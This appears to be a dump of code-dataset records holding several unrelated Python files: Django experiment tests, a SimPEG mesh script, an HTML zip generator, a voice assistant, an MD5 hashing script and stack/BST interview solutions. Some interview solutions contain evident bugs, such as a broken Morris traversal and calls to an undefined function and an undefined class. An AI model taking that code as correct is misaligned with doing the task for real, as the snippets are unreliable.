setUp(self):\n super(Anonymous2AuthenticatedIncorporateTestCase, self).setUp()\n self.incorporating = anonymous(True)\n self.incorporated = authenticated(False)\n\n\nclass Authenticated2DummyIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Authenticated2DummyIncorporateTestCase, self).setUp()\n self.incorporating = authenticated(True)\n self.incorporated = dummy(False)\n\n\nclass Authenticated2AnonymousIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Authenticated2AnonymousIncorporateTestCase, self).setUp()\n self.incorporating = authenticated(True)\n self.incorporated = anonymous(False)\n\n\nclass Authenticated2AuthenticatedIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Authenticated2AuthenticatedIncorporateTestCase, self).setUp()\n self.incorporating = authenticated(True)\n self.incorporated = authenticated(False)\n\n\nclass IncorporateTestCase(TestCase):\n def setUp(self):\n self.experiment = Experiment.objects.create(name=EXPERIMENT_NAME, state=ENABLED_STATE)\n self.experiment_counter = ExperimentCounter()\n\n User = get_user_model()\n self.user = User.objects.create(username='incorporate_user')\n self.user.is_confirmed_human = True\n\n request_factory = RequestFactory()\n self.request = request_factory.get('/')\n self.request.session = DatabaseSession()\n participant(self.request).confirm_human()\n\n def tearDown(self):\n self.experiment_counter.delete(self.experiment)\n\n def _login(self):\n self.request.user = self.user\n transfer_enrollments_to_user(None, self.request, self.user)\n\n def test_visit_incorporate(self):\n alternative = participant(self.request).enroll(self.experiment.name, ['alternative'])\n\n ExperimentsRetentionMiddleware().process_response(self.request, HttpResponse())\n\n self.assertEqual(\n dict(self.experiment_counter.participant_goal_frequencies(self.experiment,\n alternative,\n participant(self.request)._participant_identifier()))[conf.VISIT_NOT_PRESENT_COUNT_GOAL],\n 1\n )\n\n self.assertFalse(Enrollment.objects.all().exists())\n self._login()\n\n self.assertTrue(Enrollment.objects.all().exists())\n self.assertIsNotNone(Enrollment.objects.all()[0].last_seen)\n self.assertEqual(\n dict(self.experiment_counter.participant_goal_frequencies(self.experiment,\n alternative,\n participant(self.request)._participant_identifier()))[conf.VISIT_NOT_PRESENT_COUNT_GOAL],\n 1\n )\n self.assertEqual(self.experiment_counter.goal_count(self.experiment, alternative, conf.VISIT_NOT_PRESENT_COUNT_GOAL), 1)\n self.assertEqual(self.experiment_counter.participant_count(self.experiment, alternative), 1)\n\n","sub_path":"experiments/tests/test_webuser_incorporate.py","file_name":"test_webuser_incorporate.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"272251381","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 17:43:22 2019\n\n@author: ellen\n\"\"\"\n\nfrom SimPEG import Mesh, Utils\nfrom discretize.utils import mkvc, refine_tree_xyz\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nstyle_list = ['default', 'classic'] + sorted(\n style for style in plt.style.available if style != 'classic')\n\nplt.close('all')\n\n# sphinx_gallery_thumbnail_number = 4\n\n###############################################\n# Basic Example\n# -------------\n#\n# Here we demonstrate the basic two step process for creating a 2D tree mesh\n# (QuadTree mesh). The region of highest discretization if defined within a\n# rectangular box. We use the keyword argument *octree_levels* to define the\n# rate of cell width increase outside the box.\n#\n\n#size dh x nbc(base2)\n#Dimensoes na horizontal\ndh = 40 # minimum cell width (base mesh cell width)\n\n#Dimensao eixo vertical( base 2)\nnbcx =128# number of base mesh cells in x\nnbcy =128\nnbcz =128\n# Define base mesh (domain and finest discretization)\nhx = dh*np.ones(nbcx)\nhy = dh*np.ones(nbcy)\nhz = dh*np.ones(nbcz)\n\nM = Mesh.TreeMesh([hx,hy])\n\n#definir a camada \n\nxp, yp = np.meshgrid( [0., 5120.], [1000., 999.]) #layer\nxy = np.c_[mkvc(xp), mkvc(yp)] # mkvc creates vectors\n\n# Discretize to finest cell size within rectangular box\nM = refine_tree_xyz(\n M, xy, octree_levels=[1, 1], method='box', finalize=False\n )\n\n\n\n# Define objeto\nxp, yp = np.meshgrid( [2400., 2600.], [2000, 1999.]) #goal\nxy = np.c_[mkvc(xp), mkvc(yp)] # mkvc creates vectors\n\n# Discretize to finest cell size within rectangular box\nM = refine_tree_xyz(\n M, xy, octree_levels=[4, 4], method='radial', finalize=False\n )\n\n\n#=========================================\n#Criando mais uma área de dricretização\n#=========================================\n\n\n\n\nM.finalize() # Must finalize tree mesh before use\nx=M\nM.plotGrid(showIt=True)\nax = plt.gca()\nax.invert_yaxis()\nplt.show()\n\nnC = M.nC\nprint(nC)\n#print(\"Aqui!\")\n#mesh.plotGrid(showIt=True)","sub_path":"temp/malha2D.py","file_name":"malha2D.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424300456","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport json\nimport os\nimport uuid\n\nimport random\nfrom jinja2 import Environment, FileSystemLoader\nfrom random_generator_libs import specific_generator\nimport shutil\nimport uuid\n\nx=sys.argv[1]\ndata=json.loads(x)\n\nif not \"filename\" in data:\n\texit()\n\nif not \"templates\" in data:\n\texit()\n\nif data['templates'] == None:\n\texit()\n\nbase_directory_path = os.path.dirname(os.path.abspath(__file__))\ntemplate_directory_path = \"{}/random_generator_libs/template\".format(base_directory_path)\nzip_directory_path = base_directory_path.replace('scripts', 'storage')\n\nenv = Environment(loader=FileSystemLoader(template_directory_path, encoding='utf8'))\ntpl = env.get_template('outline.tpl.html')\n\nu4 = data['filename'] #str(uuid.uuid4()) \nwork_dir_path = '{}/{}'.format(base_directory_path, u4);\nif os.path.exists(work_dir_path):\n\tshutil.rmtree(work_dir_path)\n\nshutil.copytree('{}/htmls'.format(base_directory_path), work_dir_path)\n\ntext = \"\"\nfor template in data['templates']:\n\ttext += specific_generator.generate_html(template)\n\nhtml = tpl.render({'text': text})\n\nwith open('{}/index.html'.format(work_dir_path), mode='w', encoding='utf-8') as f:\n\tf.write(html)\n\nshutil.make_archive('{}/app/public/{}'.format(zip_directory_path, u4), 'zip', root_dir=work_dir_path)\nshutil.rmtree(work_dir_path)\nprint(u4)\n","sub_path":"scripts/run3.py","file_name":"run3.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160570034","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pyttsx,time,pyaudio,time,wave,sys\nfrom definitions import *\nimport speech_recognition as sr\n\n\nr = sr.Recognizer()\n\ndef log(d):\n\tt = '[' + time.strftime(\"%Y-%m-%d %H:%M:%S\") + '] :: '\n\tfileLocation = \"C:\\wamp\\www\\Piyu-UI\\interface.txt\"\n\t_file = open(fileLocation,\"a\")\n\t_file.write(t + d+\"\\n\")\n\t_file.close()\n\tprint(t + d)\n\ndef say(word):\n\tengine = pyttsx.init()\n\tengine.setProperty('rate', RATE)\n\tengine.say(word)\n\tengine.runAndWait()\n\n\ndef speak(a_name,lang):\t\n\tCHUNK = 1024\n\tif(lang=='ta'):\n\t\tBASE_DIR\t=\t'voices\\\\tamil'\n\telse:\n\t\tBASE_DIR\t=\t'voices'\n\taudioFileName = BASE_DIR + '\\\\' + a_name + WAV\n\ttry:\n\t\twf = wave.open(audioFileName, 'rb')\n\texcept FileNotFoundError:\n\t\twf = wave.open('voices\\\\beep'+ WAV, 'rb')\n\tp = pyaudio.PyAudio()\n\t_log = '' + '[[Audio]]==>' + a_name + WAV + '\\t\\t' + ''\n\tprint('PIYU CORE v.1.0 - '+ _log)\n\tlog(_log)\n\tstream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n\t channels=wf.getnchannels(),\n\t rate=wf.getframerate(),\n\t output=True)\n\tdata = wf.readframes(CHUNK)\n\n\twhile data != '':\n\t stream.write(data)\n\t data = wf.readframes(CHUNK)\n\n\tstream.stop_stream()\n\tstream.close()\n\tp.terminate()\n\t\n\n\ndef action(source):\n audio = r.listen(source)\n try:\n \tr.recognize(audio)\n \ttxtData = r.recognize(audio)\n \tprint(txtData)\n \t#mapText(txtData); \n except (KeyboardInterrupt, SystemExit):\n raise\n except LookupError:\n \tspeak(VOICE.repeat)\n \tsleepTime = getSleepTime(VOICE.repeat)\n \tprint(\"Sleeping....\")\n \tprint(sleepTime)\n \ttime.sleep(.1)\n \tprint(\"Wokeup...\")\n \n\ndef listen():\t\n\twith sr.Microphone() as source: # use the default microphone as the audio source\n\t\twhile(1):\n\t\t\tprint(\"Listening....\")\n\t\t\taction(source) # listen for the first phrase and extract it into audio data\n\t\t\t\n\ndef mapText(data):\n txts = TXT();\n txts = [txts for txts in dir(txts) \n if not txts.startswith('__')]\n\n var1 = TXT();\n obj_found = False\n for txt in txts:\n #print(var1.__getitem__(txt))\n if(data in var1.__getitem__(txt)):\n obj_found = True\n return str(txt)\n\n if(obj_found == False):\n return 'repeat'\n\ndef mapTextTamil(data):\n txts = TXTtamil();\n txts = [txts for txts in dir(txts) \n if not txts.startswith('__')]\n\n var1 = TXTtamil();\n obj_found = False\n for txt in txts:\n #print(var1.__getitem__(txt))\n if(data in var1.__getitem__(txt)):\n obj_found = True\n return str(txt)\n\n if(obj_found == False):\n return 'repeat'\n\n\nclass pre:\n def time():\n speak(getattr(TAMIL,'time'),'ta')\n speak(getattr(TAMIL,'_'+ time.strftime(\"%H\")),'ta')\n speak(getattr(TAMIL,'hour'),'ta')\n speak(getattr(TAMIL,'_'+ time.strftime(\"%M\")),'ta')\n speak(getattr(TAMIL,'minute'),'ta')\n\n def date():\n speak(getattr(TAMIL,'today'),'ta')\n speak(getattr(TAMIL,'twothousand'),'ta')\n speak(getattr(TAMIL,'_'+ time.strftime(\"%Y\").strip('20')),'ta')\n speak(getattr(TAMIL,'aam'),'ta')\n speak(getattr(TAMIL,'year'),'ta')\n speak(getattr(TAMIL,time.strftime(\"%B\").lower()),'ta')\n speak(getattr(TAMIL,'month'),'ta')\n speak(getattr(TAMIL,'_'+str(int(time.strftime(\"%d\")))),'ta')\n speak(getattr(TAMIL,'aam'),'ta')\n speak(getattr(TAMIL,'day'),'ta')\n\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126744004","text":"# importing our library of hashing algorithms\nimport hashlib\nfrom hashlib import md5\n\nwhile True:\n # asking for user input regarding which file we want to hash\n file_to_hash = raw_input(\n \"Enter the name of the file you wish to hash [Type 'exit' to exit]...\\n\")\n\n # If user types 'exit' exit\n if file_to_hash == 'exit':\n break\n\n # opening our target file in binary format\n with open('suspicious_files/' + file_to_hash, 'rb') as afile:\n # read the selected file\n buf = afile.read()\n\n # assigning the hash value to a new varible\n hash = md5(buf).hexdigest()\n\n # printing out the resulting hash value to the screen\n print(hash + \"\\n\" + \"Done!\")\n","sub_path":"hash_machine.py","file_name":"hash_machine.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312690040","text":"# Averaging spatially resolved strain in reconstructed \n# objects of nominally zero strain to determine approximate \n# strain resolution of BCDI measurement.\n\nimport numpy as np\nimport scipy.io as sio\n\nfrom argparse import Namespace\nfrom scipy.ndimage.morphology import binary_erosion\n\n\ndata = Namespace( \n **sio.loadmat( \n '/home/smaddali/ANL/Manuscripts/HEBCDI/data/estimatedStrains_correctScale.mat' \n ) \n)\n\n##########################################################\n\nrho = data.rho_stdSample\nstrain = data.strain_stdSample\nlabel=r'Au nanoparticle'\nnumErosions = 3\n\n#rho = data.rho_111_A\n#strain = data.strain_111_A\n#label = r'Grain $111$' \n#numErosions = 5\n\n#rho = data.rho_111_B\n#strain = data.strain_111_B\n#label=r'Grain $\\bar{1}\\bar{1}\\bar{1}$'\n#numErosions = 5\n\nhistbins = 50\n\n##########################################################\n\nsup = ( np.absolute( rho ) > 0. ).astype( float )\nfor n in list( range( numErosions ) ):\n sup = binary_erosion( sup )\n\nstraindata = strain[ np.where( sup > 0.5 ) ]\n\n\n#plt.clf()\nplt.hist( \n straindata, \n bins=np.linspace( straindata.min(), straindata.max(), histbins ), \n histtype='step' ,\n linewidth=2, \n label=label\n)\n\n\n\n","sub_path":"Python/strainResolution.py","file_name":"strainResolution.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"601912505","text":"import collections\nimport sys\nimport string\n\"\"\"\n1. Expression evaluation\na. Infix Notation: Operators are written between the operands they operate on, e.g. 3 + 4 including\nbrackets\n\nb. postflix or Reverse Poland calculator: Operators are written after operands.\n\nc. Given reverse polish expression create a tree\n\n Expression tree is a binary tree in which each internal node corresponds to operator and each leaf node \n corresponds to operand\n\"\"\"\n\ndef qn1a(input):\n\tarr = input.split(\" \")\n\toperand_stack = []\n\toperator_stack = []\n\toperators = [\"+\", \"-\", \"/\", \"*\"]\n\ti = 0\t\n\twhile i < len(arr):\n\t\tc = arr[i]\n\n\t\tif c not in operators and c not in [\"(\" ,\")\"]:\n\t\t\toperand_stack.append(c)\n\n\t\telif c in [\"*\" , \"/\", \"(\"]:\n\t\t\toperator_stack.append(c)\n\n\t\telif c in [\"+\", \"-\"]:\n\t\t\twhile len(operator_stack) > 0 and operator_stack[-1] in [\"*\" , \"/\"]:\n\t\t\t\tfirst_operand = operand_stack.pop()\n\t\t\t\tsecond_operand = operand_stack.pop()\n\t\t\t\toperator = operator_stack.pop()\t\t\t\n\t\t\t\tevaluation = eval(first_operand + operator + second_operand)\n\t\t\t\toperand_stack.append(str(evaluation))\n\t\t\toperator_stack.append(c)\n\n\t\telif c == \")\":\n\t\t\twhile operator_stack[-1] != \"(\":\n\t\t\t\tfirst_operand = operand_stack.pop()\n\t\t\t\tsecond_operand = operand_stack.pop()\n\t\t\t\toperator = operator_stack.pop()\n\t\t\t\tevaluation = eval(first_operand + operator + second_operand)\n\t\t\t\toperand_stack.append(str(evaluation))\n\t\t\toperator_stack.pop()\n\t\ti += 1\n\n\twhile len(operand_stack) > 1:\n\t\tfirst_operand = operand_stack.pop()\n\t\tsecond_operand = operand_stack.pop()\n\t\toperator = operator_stack.pop()\n\t\tevaluation = eval(first_operand+operator+second_operand)\n\t\toperand_stack.append(str(evaluation))\n\n\treturn operand_stack[-1]\n\"\"\"\n Test Cases: \n \"10 + 2 * 6\" ---> 22 \n \"100 * 2 + 12\" ---> 212 \n \"100 * ( 2 + 12 )\" ---> 1400 \n \"100 * ( 2 + 12 ) / 14 ---> 100 \n\"\"\"\n#print(qn1a(\"10 + 2 * 6\"))\n#print(qn1a(\"100 * 2 + 12\"))\n#print(qn1a(\"100 * ( 2 + 12 )\"))\n#print(qn1a(\"100 * ( 2 + 12 ) / 14\"))\n\ndef qn1b(s):\n\n\tmy_stack = []\n\tsplit_ = s.split(\" \")\n\toperators = [\"+\", \"-\", \"/\", \"*\"]\n\n\tfor i in range(len(split_)):\n\t\tif split_[i] not in operators :\n\t\t\tmy_stack.append(split_[i])\n\t\telse:\n\t\t\tnumber_1 = my_stack.pop()\n\t\t\tnumber_2 = my_stack.pop()\n\t\t\teval_ = eval(number_1 + \" \" + split_[i] + \" \" + number_2)\n\t\t\tmy_stack.append(str(eval_))\n\n\treturn my_stack.pop()\n\n\n\"\"\"\n2. \na. input: [] [[]] [][][] ][, ]], [[[ ]]]\n \nwrite a function to return T/F given the input is a valid (syntax correct bracket order)\n\nb.Given a compressed string in which a number followed by [] indicate how many times those characters occur, \ndecompress the string\nEg. : a3[b2[c1[d]]]e will be decompressed as a bcdcd bcdcd bcdcd e.\nAssume the string is well formed and number will always be followed by a [].\n\"\"\"\nimport collections\ndef qn2(input):\n\tif len(input) == 0:\n\t\traise ValueError(\"length must be more than zero\")\n \n\tif len(input) % 2 == 1:\n\t\treturn False\n\tstack_ = collections.deque()\n\n\tfor i in range(len(input)):\n\t\tif input[i] == \"[\":\n\t\t\tstack_.append(\"[\");\n\n\t\telif input[i] == \"]\":\t\n\t\t\tif len(stack_) <= 0 or stack_.pop() == \"]\":\n\t\t\t\treturn False \n\t\telse:\n\t\t\traise ValueError(\"only allow [ or ]\")\n \n\tif len(stack_) > 0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n\n\n\"\"\"\n3. Design a stack that allow to pop min in O (1): \n\n a. O(1) time and O(n) extra space => have another stack and keep duplicate min into this stack\n b. Design a stack that supports getMin() in O(1) time and O(1) extra space\n\n\"\"\"\nclass Qn3Stacka:\n\tdef __init__(self):\n\t\tself.min_stack = []\n\t\tself.stack = []\n\n\tdef push(self, value):\n\t\tself.stack.append(value)\n\t\tif len(self.min_stack) == 0:\n\t\t\tself.min_stack.append(value)\n\t\telse:\n\t\t\tcurrent_min = min(value, min_stack[-1])\n\t\t\tself.min_stack.append(current_min)\n\n\tdef pop(self, value):\n\t\tself.min_stack.pop()\n\t\treturn self.stack.pop()\n\n\tdef get_min(self):\n\t\treturn self.min_stack[-1]\n\nclass Qn3Stackb:\n\tdef __init__(self):\n\t\tself.min = -sys.maxsize\n\t\tself.stack = []\n\n\tdef push(self, value):\n\t\tif len(self.stack) == 0 or value >= self.min:\n\t\t\tself.stack.append(value)\n\t\t\tif len(self.stack) == 0:\n\t\t\t\tself.min = value\n\t\telse:\n\t\t\tself.stack.append(2*value - self.min)\n\t\t\tself.min = value\n\n\tdef pop(self):\n\t\ty = self.stack.pop()\n\t\tif y < self.min:\n\t\t\ty = self.min\n\t\t\tself.min = 2 * self.min -y\n\n\t\treturn y\n\n\tdef get_min(self):\n\t\treturn self.min\n\n\n\"\"\"\n4. implements a queue using 2 stacks\n\"\"\"\n\nclass MyQueue:\n\tdef __init__(self):\n\t\tself.pop_stack = stack.Stack()\n\t\tself.push_stack = stack.Stack()\n\n\tdef push(self,value):\n\t\twhile self.pop_stack.isEmpty() == False:\n\t\t\tself.push_stack.push(self.pop_stack.pop())\n\n\t\tself.push_stack.push(value)\n\n\tdef pop(self):\n\t\twhile self.push_stack.isEmpty() == False:\n\t\t\tself.pop_stack.push(self.push_stack.pop())\n\n\t\treturn self.pop_stack.pop()\n\n\tdef peek(self):\n\t\twhile self.push_stack.isEmpty() == False:\n\t\t\tself.pop_stack.push(self.push_stack.pop())\n\n\t\treturn self.pop_stack.peek()\n\n\tdef isEmpty(self):\n\t\tif self.push_stack.isEmpty() and self.pop_stack.isEmpty():\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\n\"\"\"\n7. BST with no parent pointer\n\na. Implement an iterator over a binary search tree (BST). \nYour iterator will be initialized with the root node of a BST.\n\nThe first call to next() will return the smallest number in BST. \nCalling next() again will return the next smallest number in the BST, and so on.\n\n Note: next() and hasNext() should run in average O(1) time and uses O(h) memory, where h is the height of the tree.\nTry to optimize the additional space complexity apart from the amortized time complexity. \n\ndimilar: Find if there is a triplet in a Balanced BST that adds to zero => similar to a\n\n\nb. Given a binary search tree T, where each node contains a positive integer, and an integer K, \nyou have to find whether or not there exist two different nodes A and B such that A.value + B.value = K.\nReturn 1 to denote that two such nodes exist. Return 0, otherwise.\nNotes\nYour solution should run in linear time and not take memory more than O(height of T).\nAssume all values in BST are distinct.\nno parent pointer\n\nInput 1: \n\nT : 10\n / \\\n 9 20\n\nK = 19\nReturn: 1\nInput 2: \n\nT: 10\n / \\\n 9 20\nK = 40\nReturn: 0\n\nc. check if 2 bst are similar in O(n) time and O(h) time. Similar means nodes are the same but different structure\n\n\nd. Kth Smallest Element In Tree\nGiven a binary search tree, write a function to find the kth smallest element in the tree.\n\nInput : \n 2\n / \\\n1 3\n\nand k = 2\n\nReturn : 2\n\nAs 2 is the second smallest element in the tree.\nYou may assume 1 <= k <= Total number of nodes in BST \n\ne. we have a list of trees (roots are given), check whether all of them are similar.\n Whether two trees are similar depends on the leaves from left to right.\n\ne.g. \n 1 \n 2 3\n4 5 6\n\nIf we print leaves from left to right we will get 4, 5 ,6\n\n 1\n 2 6 \n 3 \n4 5\n\nIf we print leaves from left to right we will get 4, 5, 6\n\nTherefore, the two trees above are similar.\n\"\"\"\n\nclass Node:\n\tdef __init__(self, x):\n\t\tself.value = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass qn7a:\n # @param root, a binary search tree's root node\n\tdef __init__(self, root):\n\t\tself.stack= []\n\t\tself.root = root\n\t\tself.populate_min()\n\n # @return a boolean, whether we have a next smallest number\n\tdef hasNext(self):\n\t\treturn self.stack != []\n\n # @return an integer, the next smallest number\n\tdef next(self):\n\t\tif self.hasNext():\n\t\t\tvalue_to_return = self.stack.pop()\n\n\t\t\tif value_to_return.right != None:\n\t\t\t\tnext_stack_element = value_to_return.right\n\t\t\t\twhile next_stack_element != None:\n\t\t\t\t\tself.stack.append(next_stack_element)\n\t\t\t\t\tnext_stack_element = next_stack_element.left\n\n\t\t\treturn value_to_return\n\n\t\treturn -1\n\n\tdef populate_min(self):\n\t\tcurrent = self.root\n\t\twhile current != None:\n\t\t\tself.stack.append(current)\n\t\t\tcurrent = current.left\n\n\n\ndef qn7b(root, k):\n\tmin_stack = []\n\tmax_stack = []\n\n\telement_of_min_stack = root.left\n\twhile element_of_min_stack != None:\n\t\tmin_stack.append(element_of_min_stack)\n\t\telement_of_min_stack = element_of_min_stack.left\n\n\telement_of_max_stack = root\n\twhile element_of_max_stack != None:\n\t\tmax_stack.append(element_of_max_stack)\n\t\telement_of_max_stack = element_of_max_stack.right\n\n\n\twhile len(min_stack) >0 and len(max_stack) > 0:\n\t\tif min_stack[-1].value + max_stack[-1].value == k:\n\t\t\treturn True\n\n\t\telif min_stack[-1].value + max_stack[-1].value < k:\n\t\t\t# pop min stack\n\t\t\tcurrent = min_stack.pop()\n\t\t\telement_to_add = current.right\n\t\t\twhile element_to_add != None:\n\t\t\t\tmin_stack.append(element_to_add)\n\t\t\t\telement_to_add = element_to_add.left\n\n\t\telse:\n\t\t\tcurrent = max_stack.pop()\n\t\t\telement_to_add = current.left\n\t\t\twhile element_to_add != None:\n\t\t\t\tmax_stack.append(element_to_add)\n\t\t\t\telement_to_add = element_to_add.right\n\n\n\treturn False\n\n\ndef qn7c(root1, root2):\n\tstack1 = []\n\tstack2 = []\n\n\twhile root1 != None:\n\t\tstack1.append(root1)\n\t\troot1 = root1.left\n\n\twhile root2 != None:\n\t\tstack2.append(root2)\n\t\troot2 = root2.left\n\n\twhile len(stack1) > 0 and len(stack2) > 0:\n\t\tif stack1[-1].value != stack2[-1].value:\n\t\t\treturn False\n\n\t\tcurrent1 = stack1.pop()\n\t\tnext1 = current1.right\n\t\twhile next1 != None:\n\t\t\tstack1.append(next1)\n\t\t\tnext1 = next1.left\n\n\t\tcurrent2 = stack2.pop()\n\t\tnext2 = current2.right\n\t\twhile next2 != None:\n\t\t\tstack2.append(next2)\n\t\t\tnext2 = next2.left\n\n\treturn len(stack1) == 0 and len(stack2) == 0\n\ndef qn7d_stack(root, k):\n\tcurrent = root\n\tstack = []\n\twhile current != None:\n\t\tstack.append(current)\n\t\tcurrent = current.left\n\n\twhile len(stack) > 0 and k > 0:\n\t\tcurrent = stack.pop()\n\t\tk -= 1\n\t\tif current.right != None:\n\t\t\tnext_node = current.right\n\t\t\twhile next_node != None:\n\t\t\t\tstack.append(next_node)\n\t\t\t\tnext_node = next_node.left\n\n\treturn current.value\n\ndef qn7d_morris(root, k):\n\tcurrent = root\n\t\n\twhile k > 0 and current != None:\n\t\tif current.left == None:\n\t\t\tk -= 1\n\t\t\tcurrent = current.right\n\t\telse:\n\t\t\tpre = current.right\n\t\t\twhile pre.right != None and pre.right != current:\n\t\t\t\tpre = pre.right\n\n\t\t\tif pre.right == None:\n\t\t\t\tpre.right == current # attach parent to the right\n\t\t\t\tcurrent = current.left\n\n\t\t\telse:\n\t\t\t\tpre.right =None\n\t\t\t\tk -=1\n\t\t\t\tcurrent = current.right\n\n\treturn current.value\n\n\n\n\n\n\"\"\"\n8.\nIn a party of N people, only one person is known to everyone (celebrity). That celebrity doesn’t know anyone in the party. Find the celebrity if such a person exist.\n\nInput Format\nThe first line of the input will contain N ( the number of people) and K. Each of the next K lines will contain 2 space separated integers i and j stating that person i knows person j.\n\nOutput Format\nThe person who is a celebrity.\n\nSample Input\n\n4 \n\n1 3\n2 3\n4 3\n2 1\n1 4\n\nCelebrity is 3 \n\n=> this solution uses stack but possible to use 2 pointers\n\"\"\"\n#relationship =[(1,3),(2,3)...]\ndef qn8(n, relationship):\n\tstorage = [[0] * n for i in range(n)]\n\n\tfor (m,n) in relationship:\n\t\tstorage[m-1][n-1] = 1\n\n\tstack = list(range(n))\n\n\twhile len(stack) > 1:\n\t\tfirst = stack.pop()\n\t\tsecond = stack.pop()\n\t\tif storage[first][second] == 1 and storage[second][first] == 0:\n\t\t\tstack.append(second) # first is definitely not celebrity\n\t\telif storage[first][second] == 0 and storage[second][first] == 1:\n\t\t\tstack.append(first)\n\n\treturn stack[-1] + 1\n\nn = 4\nrelationship =[(1,3),(2,3), (4,3), (2 ,1),(1,4)]\n#print(qn8(n, relationship))\n\n\n\n\"\"\"\n9. /**\n * Write a program to sort a stack such that the smallest items are in the top\n . You may use at most one additional\n * stack to hold items, but you may not copy the elements into\n * any other data structure (such as an array). The stack supports\n * the following operations: push, pop, peek, and isEmpty.\n */\n\"\"\"\n\ndef qn9(input_stack):\n\ttemp_stack = Stack()\n\ttemp_stack.push(input_stack.pop())\n\n\twhile input_stack.isEmpty() == False:\n\t\tif input_stack.peek() >= temp_stack.peek():\n\t\t\ttemp_stack.push(input_stack.pop())\n\t\telse:\n\t\t\ttemp = input_stack.pop()\n\t\t\twhile temp < temp_stack.peek:\n\t\t\t\tinput_stack.push(temp_stack.pop())\n\t\t\ttemp_stack.push(temp)\n\n\twhile temp_stack.isEmpty() == False:\n\t\tinput_stack.push(temp_stack.pop())\n\n\treturn input_stack\n\n\"\"\"\n10. \n\na. Next Greater Element Given an array of integers, replace every number with the next higher number to its right.\nIf a number can’t be replaced, we leave it as-it is. For example, 5, 2, 1, 4, 6, 7 \nneeds to be changed to 6, 4, 4, 6, 7, 7.\n\n\nb. Largest Rectangular Area in a Histogram \nFind the largest rectangular area possible in a given histogram where the largest rectangle \ncan be made of a number of contiguous bars. For simplicity, assume that all bars have same \nwidth and the width is 1 unit.\n\n\nc\nSliding Window Maximum\nGiven an array nums, there is a sliding window of size k which is moving from the very left of\n the array to the very right. You can only see the k numbers in the window. \n Each time the sliding window moves right by one position. Return the max sliding window.\n\nExample:\n\nInput: nums = [1,3,-1,-3,5,3,6,7], and k = 3\nOutput: [3,3,5,5,6,7] \nExplanation: \n\nWindow position Max\n--------------- -----\n[1 3 -1] -3 5 3 6 7 3\n 1 [3 -1 -3] 5 3 6 7 3\n 1 3 [-1 -3 5] 3 6 7 5\n 1 3 -1 [-3 5 3] 6 7 5\n 1 3 -1 -3 [5 3 6] 7 6\n 1 3 -1 -3 5 [3 6 7] 7\nNote: \nYou may assume k is always valid, 1 ≤ k ≤ input array's size for non-empty array.\n\nFollow up:\nCould you solve it in linear time?\n\"\"\"\n\ndef qn10a(arr):\n\tstack = []\n\n\tfor i in range(len(arr)):\n\t\tif len(stack) == 0 or arr[i] <= arr[stack[-1]]:\n\t\t\tstack.append(i)\n\t\telse:\n\t\t\twhile len(stack) > 0 and arr[i] > arr[stack[-1]]:\n\t\t\t\tcurrent_top_of_stack_index = stack.pop()\n\t\t\t\tarr[current_top_of_stack_index] = arr[i]\n\t\t\tstack.append(i)\n\treturn arr\n\n#print(qn6([5, 2, 1, 4, 6, 7 ]))\n\n\ndef qn10b(arr):\n\tstack = []\n\tout = 0\n\tfor i in range(len(arr)):\n\t\tif len(stack) == 0 or arr[i] >= arr[stack[-1]]: \n\t\t\tstack.append(i)\n\t\telse:\n\t\t\t#keep popping if top is less than current array\n\t\t\twhile len(stack) > 0 and arr[i] < arr[stack[-1]]:\n\t\t\t\tcurrent_index = stack.pop()\n\t\t\t\tlength = i if len(stack) == 0 else i - stack[-1] - 1 # use the previous stack index for all the left\n\t\t\t\t\n\t\t\t\tcurrent_area = arr[current_index] * length\n\t\t\t\tout = max(out, current_area)\n\t\t\tstack.append(i)\n\n\tlast_index = len(arr) # 7\n\twhile len(stack) > 0: \n\t\tcurrent_index = stack.pop()\n\t\tlength = last_index if len(stack) == 0 else last_index - stack[-1] - 1\n\t\tcurrent_area = arr[current_index] * length\n\t\tout = max(out, current_area)\n\treturn out\n\n#print(qn5([6, 2, 5, 4, 5, 1, 6]))\n#print(qn5([1,2,5,6,3]))\n\n\n\ndef qn10c(arr, k):\n\tif len(arr) == 0:\n\t\treturn 0\n\n\tdouble_queue = collections.deque()\n\tfor i in range(k):\n\t\twhile len(double_queue) > 0 and arr[double_queue[-1]] < arr[i]:\n\t\t\tdouble_queue.pop()\n\n\t\tdouble_queue.append(i)\n\n\tres = []\n\tfor i in range(k, len(arr)):\n\t\tres.append(arr[double_queue[0]])\n\t\t\n\t\twhile len(double_queue) > 0 and arr[double_queue[-1]] < arr[i]:\n\t\t\tdouble_queue.pop()\n\n\t\tdouble_queue.append(i)\n\n\t\twhile i - double_queue[0]>=k:\n\t\t\tdouble_queue.popleft()\n\n\tres.append(arr[double_queue[0]])\n\treturn res\n\narr = [1,3,-1,-3,5,3,6,7]\nk = 3\nprint(qn16(arr,k))\n\narr = [5,0,1,4]\nk = 3\nprint(qn16(arr,k))\n\n\n\"\"\"\n11. Given an encoded string, return it's decoded string.\n\nThe encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is 